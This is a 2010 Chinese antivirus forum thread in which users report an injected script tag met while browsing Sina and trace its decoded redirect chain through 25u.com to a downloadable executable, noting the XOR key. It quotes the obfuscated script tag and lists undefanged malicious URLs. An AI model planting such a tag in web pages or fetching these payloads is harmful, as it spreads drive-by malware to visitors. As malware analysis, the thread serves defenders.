jhnicjhnet - 2010-11-17 20:45:00
刚才访问新浪,总是出现cca.25u.com的入侵提示,还在一个页面上看到<script language=JavaScript src=http://a%6Aq.%4Bw%69k.%54o/tj.js></script>的异常代码
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
哥们郁闷啊 - 2010-11-17 20:48:00
我很关注!
networkedition - 2010-11-18 9:26:00
关于:hxxp://ajq.kwik.to/tj.js解密的日志(全体输出 - 17):
Level 0>http://ajq.kwik.to/tj.js
Level 1>http://ccd.25u.com/88/1211fe.htm
Level 2>http://js.tongji.linezing.com/2030508/tongji.js
Level 2>http://ccd.25u.com/88/2.js
Level 3>http://ccd.25u.com/88/safe/360safe.html
Level 4>http://ccd.25u.com/88/second1209.css
Level 2>http://ccd.25u.com/88/av.htm
Level 3>http://ccd.25u.com/88/7.htm
Level 4>http://ccd.25u.com/88/ieee.jpg
Level 4>http://ccd.25u.com/88/iee.jpg
Level 5>http://ccd.25u.com/l/ao.exe
Level 4>http://ccd.25u.com/88/ie.jpg
Level 3>http://ccd.25u.com/88/6.htm
Level 4>http://ccd.25u.com/88/iee.jpg
Level 5>http://ccd.25u.com/l/ao.exe
Level 4>http://ccd.25u.com/88/ie.jpg
Level 2>http://ccd.25u.com/88/jc_list
日志由 Redoce2.1第19次修正版于 2010-11-18 9:27:59 生成。
StreetMilk - 2010-11-18 14:20:00
到Level 4>http://ccd.25u.com/88/iee.jpg这一步,解不出下面这一步,杯具::kaka4:
Level 5>http://ccd.25u.com/l/ao.exe
networkedition - 2010-11-18 15:33:00
XOR:BD,地址已经变了:hxxp://ccj.25u.com/l/ap.exe
jhnicjhnet - 2010-11-18 20:48:00
什么意思?你们是把那个js下载后解开了?后来访问的很多网站都带了这个js,我怀疑在内存里,重启机器后正常了。硬盘上也找不到异常程序。
是昔流芳 - 2010-11-18 22:24:00
访问新浪的哪个页面,留下URL了吗?
© 2000 - 2025 Rising Corp. Ltd.